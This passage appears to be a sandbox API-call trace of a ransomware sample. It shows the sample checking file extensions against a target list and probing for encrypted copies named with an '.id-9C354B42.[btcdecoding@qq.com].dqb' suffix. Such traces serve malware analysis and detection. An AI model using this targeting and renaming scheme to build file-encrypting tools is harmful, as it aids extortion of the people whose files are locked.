Shared\\GRPHFLT\\MS.PNG") returned 61 [0036.265] lstrlenW (lpString=".zip") returned 4 [0036.265] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0036.265] lstrlenW (lpString=".rar") returned 4 [0036.266] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0036.266] lstrlenW (lpString=".bz2") returned 4 [0036.266] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0036.266] lstrlenW (lpString=".7z") returned 3 [0036.266] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0036.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0036.266] lstrlenW (lpString=".dbf") returned 4 [0036.266] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0036.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0036.266] lstrlenW (lpString=".1cd") returned 4 [0036.266] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0036.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0036.266] lstrlenW (lpString=".jpg") returned 4 [0036.266] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0036.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0036.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0036.266] lstrlenW (lpString=".doc") returned 4 [0036.266] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0036.266] lstrlenW (lpString=".docx") returned 5 [0036.266] lstrcmpiW (lpString1=".docx", lpString2="S.PNG") returned -1 [0036.266] lstrlenW (lpString=".pdf") returned 4 [0036.266] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0036.266] lstrlenW (lpString=".xls") returned 4 [0036.266] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0036.266] lstrlenW (lpString=".xlsx") returned 5 [0036.266] lstrcmpiW (lpString1=".xlsx", lpString2="S.PNG") returned -1 [0036.266] lstrlenW (lpString=".ppt") returned 4 [0036.266] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0036.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0036.266] lstrlenW (lpString=".zip") returned 4 [0036.266] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0036.266] lstrlenW (lpString=".rar") returned 4 [0036.266] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0036.266] lstrlenW (lpString=".bz2") returned 4 [0036.266] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0036.266] lstrlenW (lpString=".7z") returned 3 [0036.266] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0036.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0036.267] lstrlenW (lpString=".dbf") returned 4 [0036.267] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0036.267] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0036.267] lstrlenW (lpString=".1cd") returned 4 [0036.267] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0036.267] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0036.267] lstrlenW (lpString=".jpg") returned 4 [0036.267] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0036.267] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0036.267] lstrlenW (lpString="Alphabet.xml") returned 12 [0036.267] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0036.268] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=791686) returned 1 [0036.268] CloseHandle (hObject=0x188) returned 1 [0036.268] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml")) returned 0x20 [0036.268] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0036.268] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0036.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0036.268] lstrlenW (lpString=".doc") returned 4 [0036.268] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.268] lstrlenW (lpString=".docx") returned 5 [0036.268] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0036.268] lstrlenW (lpString=".pdf") returned 4 [0036.268] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.268] lstrlenW (lpString=".xls") returned 4 [0036.268] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.268] lstrlenW (lpString=".xlsx") returned 5 [0036.269] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0036.269] lstrlenW (lpString=".ppt") returned 4 [0036.269] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0036.269] lstrlenW (lpString=".zip") returned 4 [0036.269] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.269] lstrlenW (lpString=".rar") returned 4 [0036.269] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.269] lstrlenW (lpString=".bz2") returned 4 [0036.269] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.269] lstrlenW (lpString=".7z") returned 3 [0036.269] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0036.269] lstrlenW (lpString=".dbf") returned 4 [0036.269] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0036.269] lstrlenW (lpString=".1cd") returned 4 [0036.269] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0036.269] lstrlenW (lpString=".jpg") returned 4 [0036.269] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0036.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0036.269] lstrlenW (lpString=".doc") returned 4 [0036.269] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.269] lstrlenW (lpString=".docx") returned 5 [0036.269] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0036.269] lstrlenW (lpString=".pdf") returned 4 [0036.269] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.269] lstrlenW (lpString=".xls") returned 4 [0036.269] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.269] lstrlenW (lpString=".xlsx") returned 5 [0036.269] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0036.269] lstrlenW (lpString=".ppt") returned 4 [0036.270] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0036.270] lstrlenW (lpString=".zip") returned 4 [0036.270] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.270] lstrlenW (lpString=".rar") returned 4 [0036.270] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.270] lstrlenW (lpString=".bz2") returned 4 [0036.270] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.270] lstrlenW (lpString=".7z") returned 3 [0036.270] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0036.270] lstrlenW (lpString=".dbf") returned 4 [0036.270] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0036.270] lstrlenW (lpString=".1cd") returned 4 [0036.270] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0036.270] lstrlenW (lpString=".jpg") returned 4 [0036.270] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.270] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0036.270] lstrlenW (lpString="Content.xml") returned 11 [0036.270] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0036.270] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=27045) returned 1 [0036.271] CloseHandle (hObject=0x188) returned 1 [0036.271] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml")) returned 0x20 [0036.271] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0036.271] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0036.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0036.271] lstrlenW (lpString=".doc") returned 4 [0036.271] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.271] lstrlenW (lpString=".docx") returned 5 [0036.271] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0036.271] lstrlenW (lpString=".pdf") returned 4 [0036.271] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.271] lstrlenW (lpString=".xls") returned 4 [0036.271] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.271] lstrlenW (lpString=".xlsx") returned 5 [0036.271] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0036.271] lstrlenW (lpString=".ppt") returned 4 [0036.271] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0036.271] lstrlenW (lpString=".zip") returned 4 [0036.271] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.271] lstrlenW (lpString=".rar") returned 4 [0036.271] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.271] lstrlenW (lpString=".bz2") returned 4 [0036.271] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.271] lstrlenW (lpString=".7z") returned 3 [0036.271] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0036.271] lstrlenW (lpString=".dbf") returned 4 [0036.271] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0036.271] lstrlenW (lpString=".1cd") returned 4 [0036.272] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0036.272] lstrlenW (lpString=".jpg") returned 4 [0036.272] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0036.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0036.272] lstrlenW (lpString=".doc") returned 4 [0036.272] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.272] lstrlenW (lpString=".docx") returned 5 [0036.272] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0036.272] lstrlenW (lpString=".pdf") returned 4 [0036.272] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.272] lstrlenW (lpString=".xls") returned 4 [0036.272] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.272] lstrlenW (lpString=".xlsx") returned 5 [0036.272] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0036.272] lstrlenW (lpString=".ppt") returned 4 [0036.272] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0036.272] lstrlenW (lpString=".zip") returned 4 [0036.272] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.272] lstrlenW (lpString=".rar") returned 4 [0036.272] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.272] lstrlenW (lpString=".bz2") returned 4 [0036.272] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.272] lstrlenW (lpString=".7z") returned 3 [0036.272] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0036.272] lstrlenW (lpString=".dbf") returned 4 [0036.272] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0036.272] lstrlenW (lpString=".1cd") returned 4 [0036.272] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0036.273] lstrlenW (lpString=".jpg") returned 4 [0036.273] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.273] lstrcmpiW (lpString1=".avi", lpString2=".dqb") returned -1 [0036.273] lstrlenW (lpString="boxed-correct.avi") returned 17 [0036.273] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0037.106] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=89600) returned 1 [0037.106] CloseHandle (hObject=0x180) returned 1 [0037.106] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi")) returned 0x20 [0037.107] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0037.107] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0037.107] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0037.107] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0037.107] lstrlenW (lpString=".doc") returned 4 [0037.107] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0037.107] lstrlenW (lpString=".docx") returned 5 [0037.107] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0037.107] lstrlenW (lpString=".pdf") returned 4 [0037.107] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0037.107] lstrlenW (lpString=".xls") returned 4 [0037.107] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0037.107] lstrlenW (lpString=".xlsx") returned 5 [0037.107] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0037.107] lstrlenW (lpString=".ppt") returned 4 [0037.107] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0037.107] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0037.107] lstrlenW (lpString=".zip") returned 4 [0037.107] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0037.107] lstrlenW (lpString=".rar") returned 4 [0037.107] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0037.107] lstrlenW (lpString=".bz2") returned 4 [0037.107] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0037.107] lstrlenW (lpString=".7z") returned 3 [0037.107] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0037.107] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0037.107] lstrlenW (lpString=".dbf") returned 4 [0037.107] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0037.107] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0037.107] lstrlenW (lpString=".1cd") returned 4 [0037.107] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0037.107] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0037.108] lstrlenW (lpString=".jpg") returned 4 [0037.108] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0037.108] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0037.108] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0037.108] lstrlenW (lpString=".doc") returned 4 [0037.108] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0037.108] lstrlenW (lpString=".docx") returned 5 [0037.108] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0037.108] lstrlenW (lpString=".pdf") returned 4 [0037.108] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0037.108] lstrlenW (lpString=".xls") returned 4 [0037.108] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0037.108] lstrlenW (lpString=".xlsx") returned 5 [0037.108] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0037.108] lstrlenW (lpString=".ppt") returned 4 [0037.108] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0037.108] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0037.108] lstrlenW (lpString=".zip") returned 4 [0037.108] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0037.108] lstrlenW (lpString=".rar") returned 4 [0037.108] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0037.108] lstrlenW (lpString=".bz2") returned 4 [0037.108] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0037.108] lstrlenW (lpString=".7z") returned 3 [0037.108] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0037.108] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0037.108] lstrlenW (lpString=".dbf") returned 4 [0037.108] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0037.108] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0037.108] lstrlenW (lpString=".1cd") returned 4 [0037.108] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0037.108] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0037.108] lstrlenW (lpString=".jpg") returned 4 [0037.108] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0037.109] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0037.109] lstrlenW (lpString="ipshrv.xml") returned 10 [0037.109] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0037.222] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=2652) returned 1 [0037.223] CloseHandle (hObject=0x190) returned 1 [0037.223] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml")) returned 0x20 [0037.223] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0037.223] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0037.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 61 [0037.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 61 [0037.223] lstrlenW (lpString=".doc") returned 4 [0037.223] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.223] lstrlenW (lpString=".docx") returned 5 [0037.223] lstrcmpiW (lpString1=".docx", lpString2="v.xml") returned -1 [0037.223] lstrlenW (lpString=".pdf") returned 4 [0037.223] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.223] lstrlenW (lpString=".xls") returned 4 [0037.223] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.223] lstrlenW (lpString=".xlsx") returned 5 [0037.223] lstrcmpiW (lpString1=".xlsx", lpString2="v.xml") returned -1 [0037.223] lstrlenW (lpString=".ppt") returned 4 [0037.223] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 61 [0037.223] lstrlenW (lpString=".zip") returned 4 [0037.223] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.223] lstrlenW (lpString=".rar") returned 4 [0037.223] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.223] lstrlenW (lpString=".bz2") returned 4 [0037.223] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.223] lstrlenW (lpString=".7z") returned 3 [0037.223] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 61 [0037.224] lstrlenW (lpString=".dbf") returned 4 [0037.224] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 61 [0037.224] lstrlenW (lpString=".1cd") returned 4 [0037.224] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 61 [0037.224] lstrlenW (lpString=".jpg") returned 4 [0037.224] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 61 [0037.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 61 [0037.224] lstrlenW (lpString=".doc") returned 4 [0037.224] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.224] lstrlenW (lpString=".docx") returned 5 [0037.224] lstrcmpiW (lpString1=".docx", lpString2="v.xml") returned -1 [0037.224] lstrlenW (lpString=".pdf") returned 4 [0037.224] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.224] lstrlenW (lpString=".xls") returned 4 [0037.224] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.224] lstrlenW (lpString=".xlsx") returned 5 [0037.224] lstrcmpiW (lpString1=".xlsx", lpString2="v.xml") returned -1 [0037.224] lstrlenW (lpString=".ppt") returned 4 [0037.224] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 61 [0037.224] lstrlenW (lpString=".zip") returned 4 [0037.224] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.224] lstrlenW (lpString=".rar") returned 4 [0037.224] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.224] lstrlenW (lpString=".bz2") returned 4 [0037.224] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.224] lstrlenW (lpString=".7z") returned 3 [0037.224] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 61 [0037.224] lstrlenW (lpString=".dbf") returned 4 [0037.224] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.225] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 61 [0037.225] lstrlenW (lpString=".1cd") returned 4 [0037.225] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.225] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 61 [0037.225] lstrlenW (lpString=".jpg") returned 4 [0037.225] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.225] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0037.225] 